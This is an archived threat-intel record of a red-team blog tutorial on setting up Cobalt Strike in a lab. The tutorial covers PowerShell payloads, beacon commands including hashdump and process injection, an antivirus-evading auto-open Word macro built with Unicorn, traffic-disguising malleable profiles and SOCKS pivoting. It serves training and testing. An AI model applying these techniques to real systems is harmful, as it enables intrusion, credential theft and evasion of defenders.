{ "id": "71ea4985-06d9-401c-bc3b-f0a31eeba31b", "created_at": "2026-04-06T00:07:01.229619Z", "updated_at": "2026-04-10T03:36:13.905226Z", "deleted_at": null, "sha1_hash": "5be619397f2620f04c1da265d64104913ff07701", "title": "Cobalt Strike. Walkthrough for Red Teamers | Pen Test Partners", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6429667, "plain_text": "Cobalt Strike. Walkthrough for Red Teamers | Pen Test Partners\r\nBy PTP Admin\r\nPublished: 2019-04-15 · Archived: 2026-04-05 12:51:49 UTC\r\nRelated services\r\nRelated blogs\r\nWhat is Cobalt Strike?\r\nRaphael Mudge is the creator of Cobalt Strike (CS), around 2010 he released a tool titled Armitage, which is\r\ndescribed by wikipedia as a graphical cyber-attack management for the Metasploit Project, to put this more\r\nbluntly, Armitage is a gui that allows you to easily navigate and use MSF.\r\nFast forward to 2012 and Raphael released Armitage’s big brother: Cobalt Strike, what was initially perceived as\r\nan enhanced version of Armitage, would a few years later become regarded as one of the most used command and\r\ncontrol or as it’s commonly referred to as a C2 in red teaming today.\r\nRaphael is a legend in the industry, search for his name on YouTube alone, and you will find over 180+ videos.\r\nAnd he is someone I have personally looked up to in the sec world for many years.\r\nQuick note, IT security did not invent the term red team or C2, we have borrowed these terms from the United\r\nStates Army, which is referenced in 1999 as using the word C2 in a released field manual.\r\nSo, what’s this blog all about then? Well initially I thought it would be great to write a blog, showing people how\r\nto get a trial version of CS, install and test it out in your own lab, but I must admit I did start to waver half way\r\nthrough, and question why am I writing this, Raphael has released a YouTube video for nearly every function,\r\nproblem, and question you may ever have with CS, the freely available support is second to none, but then I\r\nthought, well it’s nice to research and write something from a fresh prospective, and secondly from a more selfish\r\npoint, repeating what we have learned helps ourselves to learn more. I will admit going back and testing with the\r\ntrial version of CS has taught me more, and I hope this blogpost is also of use to others.\r\nRight dull intro over, let’s get hacking!\r\nIngredients required for this recipe.\r\n1 x Trial copy of Cobalt Strike\r\n1 x VMware or Virtualbox for the lab\r\n1 x Copy of Kali\r\n1 x Copy of Windows 7 or 10, both if you can afford the RAM\r\nThe following ingredients can be sourced from the directly below links.\r\nCobalt Strike Trial – https://trial.cobaltstrike.com/\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 1 of 34\n\nVirtualbox – https://www.virtualbox.org/wiki/Downloads\r\nKali – https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/\r\nWindows VM/VB Images – https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/\r\nIndex\r\nHow to start\r\nTesting CS in a lab\r\nUseful Basic CS Commands\r\nTo Kill an Implant\r\nUnicorn and Cobalt Payloads\r\nMalleable Profiles\r\nPivoting\r\nHow to start\r\nBack To Index▲\r\nTo download your twenty one day CS trial browse the following link https://trial.cobaltstrike.com/ you are\r\nrequired to complete a form and submit a legitimate email address (unfortunately google, yahoo and other free\r\nmail providers are not accepted) you also need to provide a postal  address, for this I requirement I used my\r\nemployers address.\r\nAlso worth noting, Raphael is a busy person, so don’t expect to submit your details and get a trial copy that\r\nsecond, as a reference I submitted for a trial copy and it took three days till I got an email with the download link.\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 2 of 34\n\nSo, once you receive your download link, what do you do? I will be honest the process following is so simple it\r\nwill surprise you.\r\nClick (or copy and paste the hyperlink to the download files, into your browser of choice) the hyperlink. You must\r\nthen accept the end user licence, followed by choosing your download flavour.\r\nThis post is based on the Linux version, but I must admit the idea of running CS in Windows has caught my\r\nattention. I may write a follow-up covering that, but for now we’ll go with Linux:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 3 of 34\n\nFollowing clicking “Download Cobalt Strike” now!” you will receive the following file in your selected download\r\ndirectory:\r\nNow, wove the compressed file over to Kali Linux:\r\nTo access the contents of the compressed file, simply double click it, and after it open define your chosen location\r\nto extract the contents there:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 4 of 34\n\nFollowing the extraction, you can then cd to the containing files via terminal.\r\nroot@kali:~/Desktop# cd cobaltstrike/\r\nTo view the contents of the directory run the ls command.\r\nroot@kali:~/Desktop/cobaltstrike# ls\r\nagscript cobaltstrike icon.jpg peclone releasenotes.txt third-party update.jar c2lint\r\nHere’s the contents of the extracted CS directory:\r\nThe first requirement is to start the Cobalt team server, this is the C2 server were all compromised targets will\r\nbeacon back to, and secondly it is where you also connect to for management and control of compromised targets.\r\nTo start your CS team server run the following command.\r\nroot@kali:~/Desktop/cobaltstrike#./teamserver IP-address-of-your-server Your-selected-password\r\nThe screenshot below shows an extract the CS team server been started for the first time, you will note that the\r\ntrial is defined to twenty one days and that the EICAR string is added to any traffic sent via the malleable profile,\r\nthe trial is for lab use only, with regards to malleable profiles, this will be detailed later in the blogpost.\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 5 of 34\n\nNow you are now ready to start the CS client, which provides the user with GUI control to connect and manage\r\ntheir team server.\r\nTo start the CS client simply run\r\nroot@kali:~/Desktop/cobaltstrike#./cobaltstrike\r\nFollowing click OK you will be prompted to create a connection profile, for the host IP address, you can type in\r\nloopback address or if the team server is not locally hosted type in an IP address. The port you can tweak and in\r\nreal world it should be, you can add your own username but the default one of Neo is great, love the reference to\r\nMatrix! And finally, the corresponding password as defined when you started the team server:\r\nAfter hitting “Connect” for the first time you will be prompted to verify the hash, this references the hash created\r\nwhile starting the team server, check it matches, then click Yes:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 6 of 34\n\nAnd that’s it from downloading to starting, you will now have a running trial version of Cobalt, no messing\r\naround, no installing stuff, its’ all very simple and clean:\r\nTesting CS in a lab\r\nBack To Index▲\r\nAnd now the games begin\r\nSo, you want to test CS out, so how do you do it? first off spin up a Windows VM you can opt for a Windows 7 or\r\n10 host. This VM will become your target machine, which you will run CS payloads in.\r\nI would recommend while your VM is downloading, spinning up, updating or whatever its doing, you should take\r\na look at the taskbars on the top of you CS client GUI, click on the options, it’s a trial version so even if you brake\r\nit (Which I suspect you won’t, as its very stable), just start again.\r\nQuick note – This would be a good point to take a snapshot of your kali VM or VB.\r\nGive me the shells!\r\nYep I get it, you most likely just want to see the raining shells, right so let’s get to the fun part. To create your first\r\npayload, right click on Cobalt Strike top left, and select Listeners, this allows you to define, were your targets can\r\ndial back to:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 7 of 34\n\nClicking Listeners will prompt you to fill in your requirements for this new listener, add the IP address of your\r\nteam server, required port and click save:\r\nIf you wish to Wireshark, your traffic I would recommend you opt for port 80 HTTP over HTTPS which by\r\ndefault will encrypt all your traffic flows.\r\nWhile setting up the listener you will be prompted for a domain, for internal lab use you can use an IP address,\r\nwhile on an offensive engagement you would replace your defined IP address with a domain of choice:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 8 of 34\n\nAfter clicking OK and saving your listener parameters you will see a tab at the bottom open, which details your\r\nlistener settings:\r\nYou are now ready to create the payload. CS comes with an extensive payload creation offering, it covers nearly\r\nall commonly used techniques, and are incredibly simple to create, unfortunately (or fortunately depending on\r\nyour view point), all common antivirus software has a signature for each one of the available payloads, in addition\r\nto this, the trial version of CS also injects the EICAR string into the payload, but for a trial lab, you can still use\r\nthem, secondly you can use other provider solutions such as Dave Kennedy’s amazing unicorn which will take the\r\nCS generated payload and obfuscate the code, which will increase your chance of the payload bypassing AV, this\r\nmore advanced payload process will be covered later in the blogpost.\r\nTo create your first CS payload, click on Attacks / Packages / Payload Generator:\r\nSelect the listener you wish the payload to dial back to, followed by the output format. For this demo the\r\nPowerShell Command has been opted for:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 9 of 34\n\nIt creates a single PowerShell one liner, which can be copied in to a CMD or PS terminal then run. This payload\r\ncan also be placed into a .bat file and used as an OLE attack, which I may cover later on in this post.\r\nAfter clicking generate you will be prompted for a location to save the payload to:\r\nOnce you have downloaded the payload, open it using gedit or your preferred editor:\r\nNote – I have seen formatting issues when using nano and the such to copy and paste payloads.\r\nroot@kali:~/Desktop/cobaltstrike# gedit /root/Desktop/Payloads/payload.txt\r\nHighlight all of the payload text Ctrl+a, then copy it Ctrl+c and move it across to your Windows machine, then\r\nopen CMD and paste Ctrl+v it in, finally press enter:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 10 of 34\n\nA few seconds later you should see the windows machine dialling back and you should receive your session:\r\nIt is worth noting at this point the use of the * after the user name parameter, this reveals that the session is\r\nrunning in an elevated position with system rights. Typically you would not gain access to such a position from\r\nyour initial foothold, but for lab use it doesn’t harm to start at this level.\r\nTo be able to send any commands to the target you are require to enable interact mode, to do this click on the\r\nchosen target and select Interact:\r\nThis will open a new tab and you can then input your desired commands next to the beacon prompt:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 11 of 34\n\nDuring a red team engagement, you control the rate that you communicate to and from the target host, typically\r\nyou slow this communication down, in an aim to reduce the chances of your flows been spotted by the blue team,\r\nbut while working in a lab environment, you may find the slow responses to requests frustrating, and as such you\r\ncan set the beacon to respond instantly by typing in sleep 0 and pressing enter:\r\nSecondly all cmd / powershell commands can be used natively within beacon, but you do require to append the\r\nword “shell” before to enable beacon to understand your request.\r\nThe screenshot directly below shows the command error resulting from an attempt to run the cmd command\r\n“ipconfig” without appending the word shell before it:\r\nRepeating the above command request but this time appending the word ‘shell’ before it results in the command\r\nbeing sent to the target machine and the responding reply being received as can be seen in this screenshot:\r\nWhile initially having to use the “shell” command feels unnatural, you quickly become used to it.\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 12 of 34\n\nUseful Basic CS commands\r\nBack To Index▲\r\nScreenshot\r\nThe screenshot function allows you to take a snapshot of the target’s desktop, you should become comfortable\r\nusing this function, as targets often leave open spreadsheets, outlook mails, and it’s not unheard of to spot a useful\r\nusername or even a password via a screenshot on an active engagement.\r\nTo take a screenshot of a targets desktop right click on the machine in question and Explore / Screenshot or\r\nalternatively just type screenshot in the beacon prompt and press enter:\r\nAll commands and additional data that is collected by CS such as the screenshot jpg files are stored in the active\r\nlog’s directory, which in this example was located at\r\n/root/Desktop/cobaltstrike/logs/190329/192.168.1.20/screenshots:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 13 of 34\n\nThere is a misconception that CS is very GUI driven, it can be, but attentively if you wish you can use the\r\ncommand prompt as equally, it is down to user preference on how they wish to use it.\r\nProcess List\r\nTo view the targets running process list, right click on the host, Explore / Process List:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 14 of 34\n\nA tab will open detailing the running processes:\r\nIf you want to inject into another process and have system rights on the target host, highlight the process you want\r\nto inject into, following this you will then be prompted to define the listener, select the desired one and click\r\nInject:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 15 of 34\n\nBelow shows the result of injecting into a different process, a new session is started on a different PID, this can be\r\nuseful for temporary resilience, as if the initial process is closed your secondary one should still be active.\r\nHashdump\r\nSeems some commands from MSF have still survive ;0) typing hashdump when run with system privileges results\r\nin the targets hashes been collected and presented as can be seen in this screenshot:\r\nTo kill an implant\r\nBack To Index▲\r\nYou can remove a target once you have finished with it by performing the following process.\r\nClick on Session / Exit:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 16 of 34\n\n…or alternatively via beacon interact with the target you wish to remove and type exit:\r\nYou can now remove the target from your CS client window, simply click Session / Remove:\r\n…and the target is gone:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 17 of 34\n\nUnicorn and Cobalt payloads\r\nBack To Index▲\r\nLet’s go deeper\r\nSo, say you want to simulate a more sophisticated payload creation technique?\r\nThere are a few options but the quickest is trustedsec’s unicorn https://github.com/trustedsec/unicorn\r\nQuick note: Unicorn, as listed on the git hub page “Unicorn is a simple tool for using a PowerShell downgrade\r\nattack and inject shellcode straight into memory.”\r\nPersonally, I have used it for a few years, and I will happily say I’m a fan of it, but and there always is a small but,\r\nwith every other update or so the odd thing does brake, before anyone complains, unicorn is free, it’s amazing and\r\nthe level of support / commitment David Kennedy and his team put into it is incredible.\r\nA neat tip I learned recently (respect to @ZephrFish for this tip) is, if you suspect the version of unicorn you are\r\nusing is broken in some way, you can download the previous versions here\r\nhttps://github.com/trustedsec/unicorn/releases an example of this is as such, version 3.6.8 to v3.6.11 looks to no\r\nlonger support windows 7, which is not ideal due to mass support of this aging OS is still prevalent, now while the\r\nsupport for unicorn have been informed of this https://github.com/trustedsec/unicorn/issues/118 and I suspect the\r\nnext release will address this, but for this next blog section, if you wish to use windows 7 as a target, you will have\r\nto opt for unicorn version 3.6.7 https://github.com/trustedsec/unicorn/releases/tag/3.6.7 for it to work.\r\nBelow details how to git clone the most recent version of unicorn\r\nroot@kali:~/Desktop# git clone https://github.com/trustedsec/unicorn.git\r\nCloning into 'unicorn'...\r\nremote: Enumerating objects: 50, done.\r\nremote: Counting objects: 100% (50/50), done.\r\nremote: Compressing objects: 100% (22/22), done.\r\nremote: Total 538 (delta 30), reused 47 (delta 28), pack-reused 488\r\nReceiving objects: 100% (538/538), 271.34 KiB | 723.00 KiB/s, done.\r\nResolving deltas: 100% (349/349), done.\r\nThe following will detail how to use unicorn with CS.\r\nMove into the unicorn directory\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 18 of 34\n\nroot@kali:~/Desktop# cd unicorn/\r\nReview all files in the directory.\r\nroot@kali:~/Desktop/unicorn# ls\r\nCHANGELOG.txt CREDITS.txt LICENSE.txt README.md templates unicorn.py\r\nTo run unicorn in its default syntax, which will result in a response showing all possible commands\r\nroot@kali:~/Desktop/unicorn# ./unicorn.py\r\nCS and Unicorn Macro Fun\r\nThe following section details using Unicorn with a C# CS payload to make a VBA office macro with an increased\r\nchance of bypassing AV.\r\nFor lab use I opt to use Office 2010, this version of office is still a widely used flavour in the wild and as such\r\nmakes a good base of testing.\r\nBy default, the office ribbon does not show the developer tab, this is required for the creation of macro’s and as\r\nsuch the following directly below section details how to enable the developer tab.\r\nOpen MS word and go to File / Options / Customise Ribbon – and make sure the developer tab is ticked under\r\nCustomise Ribbon:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 19 of 34\n\nAn alternative way to enable the developer tab is to right click on any space on the ribbon, and select Customize\r\nthe Ribbon, and tick Developer:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 20 of 34\n\nTicking the developer function and saving the profile should now enable you to see the developer tab on the end\r\nof the ribbon:\r\nClick on the Developer tab, then on Visual Basic:\r\nThis will start Visual Basic for Applications (VBA), right click on ThisDocument / Insert / Module, to create the\r\nModual1 (Code) area:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 21 of 34\n\nThis will create the Document1 – Module1 (Code) area, this will be were you paste your Cobalt Strike / Unicorn\r\nVBA Macro into:\r\nIt is very simple to make the C# payload which is required as the base of your macro payload in CS, the following\r\nsection details this process.\r\nClick on Attacks / Packages / Payload Generator.\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 22 of 34\n\nSelect your Listener and set output to C#:\r\nSave the payload in its default format of payload.cs:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 23 of 34\n\nCS will prompt you to where it has been saved:\r\nNow take a note of the payload location and move over to terminal and move into the unicorn directory, while\r\nreferencing the downloaded payload.cs file you can create a uniquely tweaked VBA macro automatically. The\r\ndirectly below syntax shows you all you require to perform this.\r\npython unicorn.py /root/Desktop/Payloads/payload.cs cs macro\r\nThe result of the above command is the creation of a file titled “powershell_attack.txt” in your unicorn directory\r\nwhich contains a VBA office macro script:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 24 of 34\n\nOpen the “powershell_attack.txt” using your preferred editor, gedit because I’m “hu-man” ;0) and copy the full\r\ncontents Ctrl+a, Ctrl+c\r\nMove back to the windows VM and in the open Word Document1 – Module1 (Code) area and paste the unicorn\r\nmacro in full, an extract of this can be seen in the screenshot directory below:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 25 of 34\n\nFinal tweak, you need to delete the underscore from between Auto_Open on the 1st\r\n line as can be seen below,\r\nwithout doing this the macro will not auto run on the opening of the document.\r\nTo test the macro, you can run it by clicking on the following “run” arrow on the tool bar:\r\nThis should make the word doc move from the developer window back to the default work page, you will see an\r\nerror. This error is intentional and can be tweaked in the outputted “powershell_attack.txt”. The result of the error\r\nis, it forces the document to close when the OK is clicked, this makes it trickery for a standard user to nose around\r\nthe document, and can even result in the user forwarding it to others, to ask if they can open the document, double\r\nshells ;0)\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 26 of 34\n\nIf all works as expected you should receive the session back in CS.\r\nMalleable profiles\r\nBack To Index▲\r\nMalleable C2 is defied by Raphael as a domain specific language to redefine indicators in Beacon’s\r\ncommunication. Put bluntly, it allows you to manipulate the useragent used by the C2 traffic in an aim to help it\r\nblend into normal traffic under the disguise of being a legitimate source.\r\nTake a look at https://github.com/rsmudge/Malleable-C2-Profiles as it details some created by Raphael that are\r\navailable for you can use.\r\nTo download the above profiles in kali simply git clone the directory by performing the following.\r\nroot@kali:~/Desktop/cobaltstrike# git clone https://github.com/rsmudge/Malleable-C2-Profiles.git\r\nCloning into 'Malleable-C2-Profiles'...\r\nremote: Enumerating objects: 221, done.\r\nremote: Total 221 (delta 0), reused 0 (delta 0), pack-reused 221\r\nReceiving objects: 100% (221/221), 49.16 KiB | 535.00 KiB/s, done.\r\nResolving deltas: 100% (113/113), done.\r\nTo view all files in the directory simply run ls.\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 27 of 34\n\nroot@kali:~/Desktop/cobaltstrike# ls\r\nagscriptc2lintcobaltstrikecobaltstrike.jarcobaltstrike.storedataicon.jpglicense.pdflo\r\nThe c2lint program checks the syntax of the defined malleable profile, it is recommended that you do this with\r\neach profile you wish to use to verify that it will work.\r\nroot@kali:~/Desktop/cobaltstrike# ./c2lint Malleable-C2-Profiles/normal/amazon.profile\r\n[+] Profile compiled OK\r\nhttp-get\r\n--------\r\nGET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1\r\nAccept: */*\r\nHost: www.amazon.com\r\nCookie: skin=noskin;session-token=NbpB9E/faGd2tZXtRbXh9g==csm-hit=s-24KU11BB82RZSYGJ3BDK|141989901299\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHTTP/1.1 200 OK\r\nServer: Server\r\nx-amz-id-1: THKUYEZKCKPGY5T42PZT\r\nx-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=\r\nX-Frame-Options: SAMEORIGIN\r\nContent-Encoding: gzip\r\nContent-Length: 64\r\n.7..y...........0%.ARW.K..h.H.p=.......cB.. ..|.d.W7f......CO$..\r\nhttp-post\r\n---------\r\nPOST /N4215/adj/amzn.us.sr.aps?sz=160x600\u0026oe=oe\u0026sn=43985\u0026s=3717\u0026dc_ref=http%3A%2F%2Fwww.amazon.com HT\r\nAccept: */*\r\nContent-Type: text/xml\r\nX-Requested-With: XMLHttpRequest\r\nHost: www.amazon.com\r\nContent-Length: 24\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n66/7wTq/D3ql+bBKT4i3rQ==\r\nHTTP/1.1 200 OK\r\nServer: Server\r\nx-amz-id-1: THK9YEZJCKPGY5T42OZT\r\nx-amz-id-2: a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=\r\nX-Frame-Options: SAMEORIGIN\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 28 of 34\n\nx-ua-compatible: IE=edge\r\nContent-Length: 0\r\n[+] POST 3x check passed\r\n[+] .http-get.server.output size is good\r\n[+] .http-get.client size is good\r\n[+] .http-post.client size is good\r\n[+] .http-get.client.metadata transform+mangle+recover passed (1 byte[s])\r\n[+] .http-get.client.metadata transform+mangle+recover passed (100 byte[s])\r\n[+] .http-get.client.metadata transform+mangle+recover passed (128 byte[s])\r\n[+] .http-get.client.metadata transform+mangle+recover passed (256 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (0 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (1 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (48248 byte[s])\r\n[+] .http-get.server.output transform+mangle+recover passed (1048576 byte[s])\r\n[+] .http-post.client.id transform+mangle+recover passed (4 byte[s])\r\n[+] .http-post.client.output transform+mangle+recover passed (0 byte[s])\r\n[+] .http-post.client.output transform+mangle+recover passed (1 byte[s])\r\n[+] .http-post.client.output POSTs results\r\n[+] .http-post.client.output transform+mangle+recover passed (48248 byte[s])\r\n[+] .http-post.client.output transform+mangle+recover passed (1048576 byte[s])\r\n[+] .host_stage: Will host payload stage (HTTP/DNS)\r\n[!] .spawnto_x86 is '%windir%\\syswow64\\rundll32.exe'. This is a *really* bad OPSEC choice.\r\n[!] .spawnto_x64 is '%windir%\\sysnative\\rundll32.exe'. This is a *really* bad OPSEC choice.\r\n[!] .code-signer.keystore is missing. Will not sign executables and DLLs\r\n[!] .https-certificate options are missing [will use built-in SSL cert]\r\nroot@kali:~/Desktop/cobaltstrike#\r\nYou load the defined malleable profile at the same time as starting the CS team server, this accomplished by\r\nrunning the following.\r\nroot@kali:~/Desktop/cobaltstrike# ./teamserver 192.168.1.18 TestmeUP3 Malleable-C2-Profiles/normal/a\r\nOnce it’s loaded start the Cobalt Strike client as mentioned earlier in this post, to enable you access to\r\ncommunicate with the server.\r\nSet the listener as HTTP so the traffic is sent unencrypted, this will allow you to view the traffic with wireshark in\r\nthe lab environment.\r\nHere’s the listener set to HTTP:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 29 of 34\n\nGo to your windows host and install Wireshark once installed, start it listening on the interface that connects to\r\nyour virtual lab.\r\nThen on CS create some traffic by running a command such as “shell ipconfig” to the target machine:\r\nOn the target machine filter Wireshark to look for HTTP traffic, then right click on a GET request and select\r\nfollow:\r\nThis screenshot shows the results of using the amazon malleable profile:\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 30 of 34\n\nThe remains of this section detail the results of trying different malleable profile out.\r\nHere’s the results identified while using the Gmail malleable profile:\r\nAnd finally using the Bing malleable profile:\r\nPivoting\r\nBack To Index▲\r\nWith CS most users opt to live off the land with CMD or PowerShell commands and scripts, or as becoming more\r\npopular C#, but there are times when you just miss your old school techniques and tools, and CS allows you to use\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 31 of 34\n\nthese via the use of a socks server.\r\nThe following section details using other tools via CS.\r\nTo enable the socks server click on Pivoting followed by selecting Socks Server:\r\nThis will result in you been prompted to provide a port to run the server on, it will default fill this for you, and for\r\nthis demo I use that setting.\r\nAlternatively, you can type in socks followed by your defined port via beacon and press enter:\r\nNow under a Kali terminal open the proxychains.conf and set socks4 127.0.0.1 port number to match the one you\r\nset under CS.\r\nroot@kali:~/Desktop/cobaltstrike# gedit /etc/proxychains.conf\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 32 of 34\n\nSave and then you can use proxychains with your desired tool.\r\nFor the following demo I will show using RDP through the compromised target and pivoting to a connected\r\nWindows 10 box.\r\nroot@kali:~/Desktop/cobaltstrike# proxychains rdesktop 192.168.1.17\r\nProxyChains-3.1 (http://proxychains.sf.net)\r\nAutoselected keyboard map en-gb\r\n|S-chain|-\u003c\u003e-127.0.0.1:37279-\u003c\u003e\u003c\u003e-192.168.1.17:3389-\u003c\u003e\u003c\u003e-OK\r\nERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?\r\n|S-chain|-\u003c\u003e-127.0.0.1:37279-\u003c\u003e\u003c\u003e-192.168.1.17:3389-\u003c\u003e\u003c\u003e-OK\r\nConnection established using SSL.\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 33 of 34\n\nSource: https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nhttps://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/\r\nPage 34 of 34", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/" ], "report_names": [ "cobalt-strike-walkthrough-for-red-teamers" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434021, "ts_updated_at": 1775792173, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5be619397f2620f04c1da265d64104913ff07701.pdf", "text": "https://archive.orkl.eu/5be619397f2620f04c1da265d64104913ff07701.txt", "img": "https://archive.orkl.eu/5be619397f2620f04c1da265d64104913ff07701.jpg" } }